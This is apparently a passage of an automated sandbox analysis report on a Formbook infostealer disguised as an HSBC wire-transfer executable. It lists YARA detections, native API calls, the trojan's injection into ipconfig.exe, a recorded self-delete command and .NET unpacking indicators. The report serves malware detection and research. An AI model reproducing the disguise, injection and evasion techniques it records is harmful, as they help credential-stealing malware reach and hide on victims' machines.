          Source: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.346832554.0000000001960000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.346832554.0000000001960000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.290604348.0000000003AF1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.290604348.0000000003AF1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000000.322367188.000000000FC1F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000000.322367188.000000000FC1F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.287940636.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.287940636.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.547580773.0000000002DD0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.547580773.0000000002DD0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.290259549.00000000038AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.290259549.00000000038AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe, Code function: String function: 0162B150 appears 133 times
          Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: String function: 0364B150 appears 72 times
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0041A360 NtCreateFile,6_2_0041A360
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0041A410 NtReadFile,6_2_0041A410
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0041A490 NtClose,6_2_0041A490
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0041A540 NtAllocateVirtualMemory,6_2_0041A540
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0041A35A NtCreateFile,6_2_0041A35A
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0041A3B2 NtCreateFile,6_2_0041A3B2
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669910 NtAdjustPrivilegesToken,LdrInitializeThunk,6_2_01669910
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016699A0 NtCreateSection,LdrInitializeThunk,6_2_016699A0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669860 NtQuerySystemInformation,LdrInitializeThunk,6_2_01669860
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669840 NtDelayExecution,LdrInitializeThunk,6_2_01669840
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016698F0 NtReadVirtualMemory,LdrInitializeThunk,6_2_016698F0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669A50 NtCreateFile,LdrInitializeThunk,6_2_01669A50
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669A20 NtResumeThread,LdrInitializeThunk,6_2_01669A20
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669A00 NtProtectVirtualMemory,LdrInitializeThunk,6_2_01669A00
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669540 NtReadFile,LdrInitializeThunk,6_2_01669540
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016695D0 NtClose,LdrInitializeThunk,6_2_016695D0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669710 NtQueryInformationToken,LdrInitializeThunk,6_2_01669710
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016697A0 NtUnmapViewOfSection,LdrInitializeThunk,6_2_016697A0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669780 NtMapViewOfSection,LdrInitializeThunk,6_2_01669780
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669660 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_01669660
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016696E0 NtFreeVirtualMemory,LdrInitializeThunk,6_2_016696E0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669950 NtQueueApcThread,6_2_01669950
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016699D0 NtCreateProcessEx,6_2_016699D0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0166B040 NtSuspendThread,6_2_0166B040
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669820 NtEnumerateKey,6_2_01669820
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016698A0 NtWriteVirtualMemory,6_2_016698A0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669B00 NtSetValueKey,6_2_01669B00
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0166A3B0 NtGetContextThread,6_2_0166A3B0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669A10 NtQuerySection,6_2_01669A10
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669A80 NtOpenDirectoryObject,6_2_01669A80
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669560 NtWriteFile,6_2_01669560
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669520 NtWaitForSingleObject,6_2_01669520
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0166AD30 NtSetContextThread,6_2_0166AD30
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016695F0 NtQueryInformationFile,6_2_016695F0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669760 NtOpenProcess,6_2_01669760
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0166A770 NtOpenThread,6_2_0166A770
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669770 NtSetInformationFile,6_2_01669770
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669730 NtQueryVirtualMemory,6_2_01669730
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0166A710 NtOpenProcessToken,6_2_0166A710
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669FE0 NtCreateMutant,6_2_01669FE0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669670 NtQueryInformationProcess,6_2_01669670
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669650 NtQueryValueKey,6_2_01669650
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669610 NtEnumerateValueKey,6_2_01669610
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016696D0 NtCreateKey,6_2_016696D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689A50 NtCreateFile,LdrInitializeThunk,16_2_03689A50
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689910 NtAdjustPrivilegesToken,LdrInitializeThunk,16_2_03689910
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036899A0 NtCreateSection,LdrInitializeThunk,16_2_036899A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689860 NtQuerySystemInformation,LdrInitializeThunk,16_2_03689860
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689840 NtDelayExecution,LdrInitializeThunk,16_2_03689840
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689710 NtQueryInformationToken,LdrInitializeThunk,16_2_03689710
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689FE0 NtCreateMutant,LdrInitializeThunk,16_2_03689FE0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689780 NtMapViewOfSection,LdrInitializeThunk,16_2_03689780
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036896E0 NtFreeVirtualMemory,LdrInitializeThunk,16_2_036896E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036896D0 NtCreateKey,LdrInitializeThunk,16_2_036896D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689540 NtReadFile,LdrInitializeThunk,16_2_03689540
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036895D0 NtClose,LdrInitializeThunk,16_2_036895D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689B00 NtSetValueKey,16_2_03689B00
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0368A3B0 NtGetContextThread,16_2_0368A3B0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689A20 NtResumeThread,16_2_03689A20
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689A00 NtProtectVirtualMemory,16_2_03689A00
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689A10 NtQuerySection,16_2_03689A10
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689A80 NtOpenDirectoryObject,16_2_03689A80
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689950 NtQueueApcThread,16_2_03689950
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036899D0 NtCreateProcessEx,16_2_036899D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0368B040 NtSuspendThread,16_2_0368B040
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689820 NtEnumerateKey,16_2_03689820
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036898F0 NtReadVirtualMemory,16_2_036898F0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036898A0 NtWriteVirtualMemory,16_2_036898A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689760 NtOpenProcess,16_2_03689760
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0368A770 NtOpenThread,16_2_0368A770
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689770 NtSetInformationFile,16_2_03689770
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689730 NtQueryVirtualMemory,16_2_03689730
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0368A710 NtOpenProcessToken,16_2_0368A710
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036897A0 NtUnmapViewOfSection,16_2_036897A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689660 NtAllocateVirtualMemory,16_2_03689660
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689670 NtQueryInformationProcess,16_2_03689670
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689650 NtQueryValueKey,16_2_03689650
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689610 NtEnumerateValueKey,16_2_03689610
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689560 NtWriteFile,16_2_03689560
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689520 NtWaitForSingleObject,16_2_03689520
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0368AD30 NtSetContextThread,16_2_0368AD30
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036895F0 NtQueryInformationFile,16_2_036895F0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C7A360 NtCreateFile,16_2_02C7A360
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C7A490 NtClose,16_2_02C7A490
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C7A410 NtReadFile,16_2_02C7A410
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C7A3B2 NtCreateFile,16_2_02C7A3B2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C7A35A NtCreateFile,16_2_02C7A35A
          Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000000.278790638.0000000000456000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameISectionEnt.exe. vs HSBC ... Wire Transfer Copy.exe
          Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.293103917.0000000005CD0000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUI.dll@ vs HSBC ... Wire Transfer Copy.exe
          Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.289914483.00000000028A1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs HSBC ... Wire Transfer Copy.exe
          Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.292767031.0000000005850000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs HSBC ... Wire Transfer Copy.exe
          Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.290051006.000000000296B000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs HSBC ... Wire Transfer Copy.exe
          Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.290259549.00000000038AD000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUI.dll@ vs HSBC ... Wire Transfer Copy.exe
          Source: HSBC ... Wire Transfer Copy.exe, 00000006.00000000.286928086.0000000000C76000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameISectionEnt.exe. vs HSBC ... Wire Transfer Copy.exe
          Source: HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346567819.000000000171F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs HSBC ... Wire Transfer Copy.exe
          Source: HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346749422.00000000018AF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs HSBC ... Wire Transfer Copy.exe
          Source: HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346869714.0000000001997000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameipconfig.exej% vs HSBC ... Wire Transfer Copy.exe
          Source: HSBC ... Wire Transfer Copy.exeBinary or memory string: OriginalFilenameISectionEnt.exe. vs HSBC ... Wire Transfer Copy.exe
          Source: HSBC ... Wire Transfer Copy.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: HSBC ... Wire Transfer Copy.exeVirustotal: Detection: 16%
          Source: HSBC ... Wire Transfer Copy.exeReversingLabs: Detection: 40%
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeFile read: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe:Zone.IdentifierJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe "C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe"
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess created: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\HSBC ... Wire Transfer Copy.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@3/2
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6888:120:WilError_01
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
          Source: HSBC ... Wire Transfer Copy.exeString found in binary or memory: /ISectionEnt;component/views/addbook.xaml
          Source: HSBC ... Wire Transfer Copy.exeString found in binary or memory: views/addbook.baml
          Source: HSBC ... Wire Transfer Copy.exeString found in binary or memory: views/addcustomer.baml
          Source: HSBC ... Wire Transfer Copy.exeString found in binary or memory: /ISectionEnt;component/views/addcustomer.xaml
          Source: HSBC ... Wire Transfer Copy.exeString found in binary or memory: S/ISectionEnt;component/views/addbook.xamli/ISectionEnt;component/views/borrowfrombookview.xaml_/ISectionEnt;component/views/borrowingview.xamlY/ISectionEnt;component/views/changebook.xamla/ISectionEnt;component/views/changecustomer.xaml]/ISectionEnt;component/views/customerview.xamla/ISectionEnt;component/views/deletecustomer.xamlW/ISectionEnt;component/views/errorview.xaml[/ISectionEnt;component/views/smallextras.xaml[/ISectionEnt;component/views/addcustomer.xaml
          Source: HSBC ... Wire Transfer Copy.exeString found in binary or memory: *images/booksimage.jpg$views/addbook.baml1J,views/addcustomer.baml
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: HSBC ... Wire Transfer Copy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: HSBC ... Wire Transfer Copy.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: ipconfig.pdb source: HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346858842.0000000001990000.00000040.00020000.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346858842.0000000001990000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346567819.000000000171F000.00000040.00000001.sdmp, HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, ipconfig.exe, 00000010.00000002.548146108.0000000003620000.00000040.00000001.sdmp, ipconfig.exe, 00000010.00000002.549823291.000000000373F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: HSBC ... Wire Transfer Copy.exe, HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346567819.000000000171F000.00000040.00000001.sdmp, HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, ipconfig.exe, ipconfig.exe, 00000010.00000002.548146108.0000000003620000.00000040.00000001.sdmp, ipconfig.exe, 00000010.00000002.549823291.000000000373F000.00000040.00000001.sdmp

          Data Obfuscation:

          .NET source code contains potential unpacker
          Source: HSBC ... Wire Transfer Copy.exe, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.HSBC ... Wire Transfer Copy.exe.3e0000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.HSBC ... Wire Transfer Copy.exe.3e0000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.c00000.9.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.2.HSBC ... Wire Transfer Copy.exe.c00000.1.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.c00000.5.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.c00000.1.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.c00000.3.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.c00000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.c00000.7.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.c00000.2.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 0_2_003E92F5 push ds; ret 0_2_003E9340
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 0_2_003E9361 push ds; retf 0_2_003E9364
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 0_2_003E9347 push ds; ret 0_2_003E934C
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0041EA76 push 1501B1CAh; retf 6_2_0041EA7B
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_00416C20 push C10A24AAh; iretd 6_2_00416C25
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_004164D3 push eax; retf 6_2_004164D6
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0041D4B5 push eax; ret 6_2_0041D508
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0041D56C push eax; ret 6_2_0041D572
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0041D502 push eax; ret 6_2_0041D508
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0041D50B push eax; ret 6_2_0041D572
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_00C092F5 push ds; ret 6_2_00C09340
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_00C09347 push ds; ret 6_2_00C0934C
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_00C09361 push ds; retf 6_2_00C09364
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0167D0D1 push ecx; ret 6_2_0167D0E4
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0369D0D1 push ecx; ret 16_2_0369D0E4
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C7EA76 push 1501B1CAh; retf 16_2_02C7EA7B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C764D3 push eax; retf 16_2_02C764D6
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C7D4B5 push eax; ret 16_2_02C7D508
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C76C20 push C10A24AAh; iretd 16_2_02C76C25
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C7EDAE pushad ; ret 16_2_02C7EDAF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C7D56C push eax; ret 16_2_02C7D572
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C7D502 push eax; ret 16_2_02C7D508
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C7D50B push eax; ret 16_2_02C7D572
          Source: initial sampleStatic PE information: section name: .text entropy: 7.86790735928

